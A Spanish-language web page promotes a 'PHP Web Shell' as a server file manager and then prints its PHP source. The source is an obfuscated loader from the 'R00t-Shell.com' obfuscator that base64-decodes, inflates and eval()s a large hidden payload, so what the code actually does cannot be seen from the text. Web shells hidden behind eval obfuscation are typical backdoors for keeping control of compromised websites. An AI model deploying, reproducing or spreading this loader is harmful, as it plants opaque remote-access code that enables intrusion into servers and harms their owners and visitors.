Dominando PHP Web Shell: Guía Completa para la Gestión de Archivos del Servidor
PHP Web Shell es una herramienta sencilla y versátil que permite a los usuarios gestionar los datos de un servidor web directamente a través de una interfaz web. Admite una variedad de comandos como ls, pwd, cd, touch, rm, mkdir, rmdir, download, y upload, ofreciendo un conjunto completo de funcionalidades para manejar archivos y directorios.
Capacidades
Es importante destacar que el PHP Web Shell no proporciona acceso directo al shell del servidor (por ejemplo, bash, sh). En su lugar, utiliza funciones PHP predefinidas para realizar operaciones del sistema de archivos, garantizando un entorno controlado y seguro.
Características ✨
- Ejecutar Comandos: Admite una amplia gama de comandos para operaciones con archivos y directorios.
- Subida y Descarga de Archivos: Suba y descargue archivos de forma segura a través de la interfaz web.
- Gestión de Sesiones: Mantiene el estado del directorio actual mediante la gestión de sesiones.
- Interfaz de Usuario Amigable: Incluye una barra lateral con los comandos y la documentación disponibles, mejorando la usabilidad.
- Documentación Completa: Proporciona guías detalladas directamente en la interfaz para ayudar a los usuarios.
Uso
Para utilizar eficazmente el PHP Web Shell, familiarícese con los siguientes comandos disponibles:
- ls – Lista los archivos en el directorio actual
- pwd – Muestra el directorio de trabajo
- cd [dir] – Cambia de directorio
- touch [file] – Crea un nuevo archivo
- rm [file] – Elimina un archivo
- mkdir [dir] – Crea un nuevo directorio
- rmdir [dir] – Elimina un directorio
- download [file] – Descarga un archivo
- upload – Subir un archivo
Ejemplo: Crear y Listar un Directorio
Para crear un nuevo directorio llamado new_folder y listar su contenido:
mkdir new_folder
ls new_folder
Ejemplo: Subir un Archivo
Para subir un archivo:
- Haga clic en la opción upload en la barra lateral.
- Seleccione el archivo de su sistema local.
- Confirme la carga para transferir el archivo al servidor.
Consideraciones de Seguridad
Aunque PHP Web Shell es una herramienta poderosa para gestionar archivos en el servidor, es crucial implementar medidas de seguridad para evitar accesos no autorizados:
- Autenticación: Implemente protección con contraseña para restringir el acceso.
- Lista Blanca de IPs: Limite el acceso a direcciones IP específicas.
- SSL/TLS: Use HTTPS para cifrar los datos transmitidos entre el cliente y el servidor.
Conclusión
PHP Web Shell ofrece una forma conveniente y eficiente de gestionar archivos en el servidor a través de una interfaz web. Al comprender sus características e implementar los protocolos de seguridad necesarios, los usuarios pueden mantener el control de sus entornos de servidor de manera efectiva.
<?php
/* _________________________________________________________________________________
| Project: R00t-Shell.com - Php Obfuscator 2.0.15 |
| Author: R00t Shell |
| Date: 2025-03-06 06:45:35 |
| Website: https://r00t-shell.com |
| Virus Total: 9630e775b58db5dca91296321e9a846052730abda6292fabb361103bb1b74f4e |
| Description: Obfuscates PHP code to increase security and protect source code. |
|_________________________________________________________________________________|
*/
$Cyto = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUPHJrNBE\x41tY\x41";
$Lix = "\x3dERfYR\x4381FYKF92S\x61iK\x61Dg3G8nnnL5VitKettTeSOS7\x41inek/l8l/viV18M\x42tMoP/\x437\x62/Xq3QlyXlW8jDMvH\x63k9ekHWYNeDLtVTOK/WE\x62q\x414iXh3dhsW\x43TXIh\x62g/HJo\x421QZXsl6dRY3\x61Lrr\x62m\x61\x41leXLXJ\x426JdT1Q\x61Y\x41Mjj3ld5NxKX\x2b\x62ih6OK9FflrXttg\x2bmeiEi\x42hDUM8o\x2b\x61yIeo007L\x61NPmUJTkiehwOxy7z\x2b2ifnqV/jjrY\x43\x41zknLrT/Lv4JGuz/f4N9QXYl1UNNWedW\x41/\x63SSuos\x42g\x61\x63t4vYvL\x63R\x41MQLHrDUzWzD2x4W60VXdz9t4U\x439mHlSn0\x43Lnx9K2e/5tw\x615ssxxtWP\x434vxY\x42QvJ11J\x61t77Nz/\x638xR\x638G\x42TDkSZm\x62\x42FY1fWej\x43\x61dU/\x2b\x63uooi\x63JSeYqJJzrWonPeJM3s\x43EfT2qFW\x42eKRL8oWWJxv/LsUH4ydzGR\x43\x41OxPy\x63m1MgTFgqGfd0LSgZH\x2boeKSQ2/Di\x43\x61\x63LOwEMnFJG88\x621KpjR\x43k84OKhs\x42\x2b\x41nYq\x2b\x43GtKlUwto4zuQn6KJdpyzgoRR15\x42P\x43nPQ\x2bLlpkEF5WJ5\x625\x41f\x63Ksn0R\x62Wi35\x41Wz6vJe1f91vqkvSM\x62Mgro3J4Ie7\x41sHp3wpPhOUhuT1xmq9t1FY\x42ogjLWu/KnOX1RKSSuLU0jMsWov\x43UudU\x2bEvvVfvWdmL\x42xWtt6txiMxgIJ\x63d7lPtW4\x41xwYr\x2b6vlS\x63m48\x63WutkqvUoLN7\x42J\x43VQXgpwoLQlezj\x411D8eX6wzk7PRHtzk3\x43ynkxv843v4z/j\x62p8u\x42J4\x62HGNh7eEj\x63x533NgxvO0pH4QW0jP6yDf6Zns9woZ\x42mVN\x41\x42T6S6D\x42mm/2YuMzI\x2by\x61IdvM3G2FN/lmKfWeMv8\x63fXsVv6UgtJP6NP30qk\x41d3i2xNqt1of9\x43f6jr\x425xnPt\x43IDd3lXO\x43l1rGh0DprjReiuH6\x43v9Ex\x41\x2bv\x63o\x43OJtkxSgy\x41\x61WlR9\x63J\x61gVdJ5jO04m/h\x61h8tf2\x63yiuZE\x61\x43ZUn17oHh77gn\x42YoI9\x61Eyx\x2b\x61Zyl8R\x639sskgZ4T\x42V7\x63ugv\x61O\x62hrt\x42MmJKM7D8yrDhoN\x41u/\x41f5nmU\x63TQf/\x2bJ9G\x42JWM2dp\x61I6Hm0182NEez0rx9\x61pFrhlny4Xu67dlV5jrkZ73gsNiDKTQttk3o\x62HDYd\x41y\x2bqZo7eKtPwoOT\x2bsiJ\x63\x2bP/4KoK5s4pHN\x434PLsF6Ws8v\x63\x41\x42Ng12uULkP5T0nx5oW\x63dvJxm5uJGIYitLNJ\x61VopHZI7Of4wwxovUWQwYWKFsOq852iTtxyqts3NfHmUJ/\x426U0Ul\x41De\x411QuJKstj\x43fj\x2bVVgL8K\x41E9Ev//Ou///DyPf2sO7u5\x62KJRT\x42kln\x63J2\x63QhmdgEgUHf//9w0y3UF2fV\x417S\x42dyrGTtEP\x41E6tJYsewOkZm2QE4ISN\x43/KQ\x2bw0lYFmjJzSU\x61\x61iNO9pgW\x61iQ3Zrmj7z4s4t55E\x61W7UYDFo0v9\x2b/xpgr92MrJZtSoyVrtQ/ejkGrQtqXgKf\x63\x43nwXeRYP6hsxWVEtNZ\x43\x61n/Ki7g2\x433M3VSjqiRIOrU2js4Wlq\x43fXRZIeSNKy/gjnL4WGeSUh1pdWzXQWQrU1F1Ud\x415zU\x62NXqQe\x41rpd\x63SRdQJ7QNGlS\x43/t\x41\x415TWwQ8X\x63H\x43KxLWdXiNIRk/Jk0\x42M\x62ke\x62io\x4367ypDov9m\x42P4gfel4Jspi\x41GsNXLS8NXodumMIM03\x43XW1rxJviXUuOigsshXm5\x2bxQV9iOxskxqNhK\x63\x62PQzlMFqNo\x2bI2EL\x62isqrDQ\x61\x61Wms\x42UuLKpiRR1TUrvV\x618JqRlYuj6x2mRRirgk\x425Dmkwr4R1rfl\x63ur3\x43QOG\x41ZRhuKxJ\x42gxWVM59pj9PqqVp4VxVokMw2vdj\x43x1\x62nTQK\x2bPEMgS8FyZGEwesKWp\x4202o2oEi3ts71f\x61oPzPjD4ueMlGSJVoEHkiD6Gh5lJuyKstrutPRYr0XFMWdr1xh\x41Ug17eUIY\x61Yug\x61EG7oo\x2bR2DNqrkDtsLn02izX\x63t\x431rnvSEHLwvq13w7wKK\x62K/vPYP\x41puNTfuRiuq\x63U\x61wE54ig\x43LshK\x410GhW\x2bp8TlkeTVOt\x2bWzP5Y\x62G8F988r\x62\x2b\x2bei9z7Z\x42XO8w//Mwr\x2b9h\x61/h\x432\x625wuvV8\x2b6Wv9y1rmtO\x63Vs4w1\x43NNx5SUhW\x63X\x62q\x63vsTT9\x434\x62O\x42Ry\x61X\x43W\x61\x63jP8Uo2x53DdkJ7GNL\x42\x62l4\x439ltgHO9gK\x63ur\x42iKmjl6kjN9yZFlLnHwYXGDWJ0ghU00Vsr\x63j\x63jPjSnh\x41rGpt\x2b\x2b68SUriKP33Lo6UrYRSMPwkIG\x413OOE/6LVKD65mpH79WhRKU9t\x43HgWOhN\x43X2S\x63Gl\x43EoonLmJ3J3YeYiS\x41Se3qlXvwfO\x62\x627U\x42\x62KGrXIytZYQQQvT\x63KD9LQg8L7XM\x43VgpgRd\x43\x43VkYGX\x41V\x42iSogDvkJyEP8ojPOh\x41h\x62fywop\x61D4igU\x2b\x43h7gLoTIZ56rUM5\x6130pQJ0FD\x42725Zp\x63Hsz\x62P8\x42X1eN/\x639i\x63Ksdr16lD1VFS\x2b\x635OzHe\x622wj\x629\x42fo74EZ\x42Z6SFgdT23\x2bFdO\x41\x41\x63ZY7/G\x42\x42pPxG76EjuQHudtNuIszWJr7/P\x617oh\x62F\x43MDf0oV\x63O737\x639\x43dROx2NGHytfrE\x420XX\x41DNFEe8\x636d6Ot1St967M5qJ0HjtvdTevdtf58sfYnzMKMETw7E9HrRDxu\x42ezgtP7yFxM9dTYt\x63fEnTP3m0\x43V\x41\x61Rr7LHDk0SEoQQWOyn/MmNMPgRdtqji8SI3Oz/9kd8tjPgIsMx1U2i2vvHh4I1wm7\x42Vi2/VI8inR8vP7sgPV\x61rPN\x42nVm0oMT16D\x43dPK4J7\x62FqyH\x616qjd\x2bO7mShuXlwM43\x43r\x43G\x63MwHZihj/VeNKHJ/\x43MHi0\x43kT6\x42P\x2b2Ynf8pn07O7Z4\x62\x43\x43u5NtGE\x62R\x61Sk\x62\x63MO52Ik\x61vOnrs\x63O35Gp2jmowZ\x430wH/2T\x41\x62TNH\x61tw8S3EI6\x61LQGhreQZTs/jpS06j\x61R/W\x41d5Dy8oSkHRLV3rH3GUX\x42Xz4ip8\x43\x63vqOvi\x2b\x2bP8t00/7\x4397EFi1KyMs046vjOx\x42Pklf7oLP\x2b0DOGqr\x2bkSxZ6f91rd8\x62P41uk\x426teelMdUvNHiTmggKHf\x63Vfe/Xv2Rq7Vhm6Z7WdKSHM\x62\x42Kg1/\x63\x63W\x2bOSh5\x2bHkD\x427sYy9lkN\x61dQuDnx6\x413v0J1HDWlzSuPS\x63zGyPYWx\x61\x63mEYGo5M\x41eE1gpv2mO\x421n\x41Wjf8\x43Q7yJznt5\x2bt\x41PG\x62Eksrx\x43IMuYsssK\x61x0t\x41\x62u4PiY1jdGw\x61d\x63PyEtL7\x2bTJUhl5uSgmhG6y\x638uXqK\x63dYouI\x43\x63xR6Qjgq72XljxJ\x43oW\x41/80\x61\x42X8hkgho6DYq\x2bJ\x2b16NX/IV7SXrrNxDZtuE250vXJJzSq0/dSSFRsVgKz\x62tmVleKGhI83O8tjHt6SwPN0xG\x2bhvf\x2bfjJ\x43HvSLUGOh\x42n\x61PO0\x62TvLHNO\x61K9P9\x62SH1wQyZHsiifw9M5\x610W\x42Ep\x62ypwtYwwMiDS\x62\x62\x42\x41nfMK\x41r\x623yj874e\x2b6orXUNvY\x61HqVmYd1DMs8y\x42L\x2b\x62TU9\x41IuN\x41/FqFFptpe\x2bYhEjVE2GXu2kUJ944knEZXZuPqufJ\x62xHpK2tPwuWUU55RpsV\x42\x43qG2\x43e\x61omlmq0Xzvp2Rh\x62TvY3R\x42ukKr\x63dg1ITYXdRHDOj5FTOg1T\x2bDQHw8UtVTV0F\x617y\x411dpw6SlS/\x41mypVk1SfWPx2KiS9vJpE60\x2bp7\x43g\x43D15kD\x62X\x62\x2bsH7W7dFGlwFjUo5\x2bn\x61\x63H4pYywO64jpO\x415\x43RFpuqSKwetH\x41\x61PEskY64NVkGp0R\x627tM0pxi7nTg\x62NlzgSVih1OsE1SY5fU8gjdofL\x62E6utfVdf\x6300F\x41q\x61kVl9dY6mF4XW\x41TOKE8vx\x43PiJXl6Kp8STu4xSMTljKINm3TO13\x43M/YJePdIUHIOpf\x41W3leWVMLKpzp\x62vFO\x43NtXugjVDooyxIpxFV1g0/6\x43F5u5\x61dN\x42S56SmO\x41vn\x62H1rL4XJ\x41WDM63\x425x0U\x42K9OX\x43SyGOVG\x43Mh9lNvyVS\x41nk2Nh0M0swIoZlGyzxEYni\x61LxjKp/dg\x62Wyh\x639w\x63Vpu1ZR\x41k53Hukek0tJ\x62dFxiUOQMwezNq9OGfFI\x42RpESeRL5o3xeRLZOJJv2Tfy0F0UKQ\x43yUQR6i0OIyYjRR6YmjL/Gt4izSyG1mD43S\x63T\x43\x43ux3WN6/kGP\x2b\x61\x41JXtTXULLN4fmoqV4HkXEd/kTO\x2bJfuwP5jex\x41sSXNDIXidlQSM6KdMSJTxp\x43wof\x61nxP0ORFLEh\x42hy\x635TEdP\x61NLpMvHlXsj\x42ShMHO78\x63rFET\x423eu6DxgNkDpnTq\x62SyFkuz\x42tE\x42\x63hgr\x43gpzx9tgf7R4lTL3mDsU0uw4EGkl\x43Hg\x43\x43wV8WPp\x2bF\x43silykPF\x619sIoXZ8Tjkyt\x42h0QsP8DnXOm1Wdm80FlP/JljfVQ95uLRMVzmfhyOVjYpjWikzk\x415nvP1\x41Hv0xMZLJXk/wDe1wLiXN9OnZYfZdu9j5DDtqYKurGQUW/6VHNLIH\x41F7MxZ1ly\x63RJ2o\x61\x41dEi\x61WU\x62y0wNIq6xpm\x436Z\x62K7jen1\x63\x2b3\x41d74Yw2y2eQvLfqrUyI3xf9vERrrZV0mFEUSGRVY5nh4mT\x61dhlk\x43q\x42WYLDT6\x61qNTsXOp\x63mq5GNnhVm\x638LvfxXv\x42z\x436rukZFO\x63SEQSK\x2bQVEW\x2bDgRIudO\x62e\x439Lyj\x41Rr\x63TkrVKpkhO\x2btPx7fT61r1ZHe/oH\x2b2UG\x2boze/54GK\x42f87iPeJn\x63vwz1\x63khHSzv\x62vE9r02\x43tD02Tnh5No\x62gYxFeUhYm\x42\x63\x43fhTj8lIrXw\x62OH\x63M5DvdKo9yU1J\x63ko2\x63N4eN7gVRWJSd\x41P/5PszeY\x43NonKDK\x63rkM\x42FTJ\x41SS2x7iUhR2\x2brzH\x42DE4\x62MWgE/OFWws\x63GP1L3j\x2b7HdqwWikUo7dI8Gns32\x61Ek\x62wV88nVKqI\x421Qy\x62wTttQ\x42kSMh7I\x42\x63\x618FDzEsEQRmsnDTJ\x62yVE\x625ufp5\x42\x2b5hkJk/JSzXN\x43XMzznN\x2bQ4O780perj\x62Sd5RN8t52WNX\x62E\x61tpH\x63n\x63wn\x2b1Sg\x42R7/J\x43erGLNRoSxx5F15\x43WdyXLujI\x43J6\x2b9h\x63GMR2d3e3qUxFLM87k7Gj5Wt1\x63iIjlTLsj\x62QRJmMWKznIS1ne3\x61\x43F\x62vtnZnz15\x63\x63mjN\x43Uv\x42QnyNLi6uDPjnEmPo/9kfMmfJ2rt8f\x420/\x63Y6JUkDNr0iDdIJ\x421\x63\x63U2Jn2YL\x433yu7EtFtJu\x62vsrD\x41l3khZfgfD5Vvxj722\x620e8Z5gp\x42wJex7kDxGQ8J5gt\x42wJex7jD\x42HQ854gx\x42wJex7iDRHQ8p4g1\x42wJe";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
exit;
?>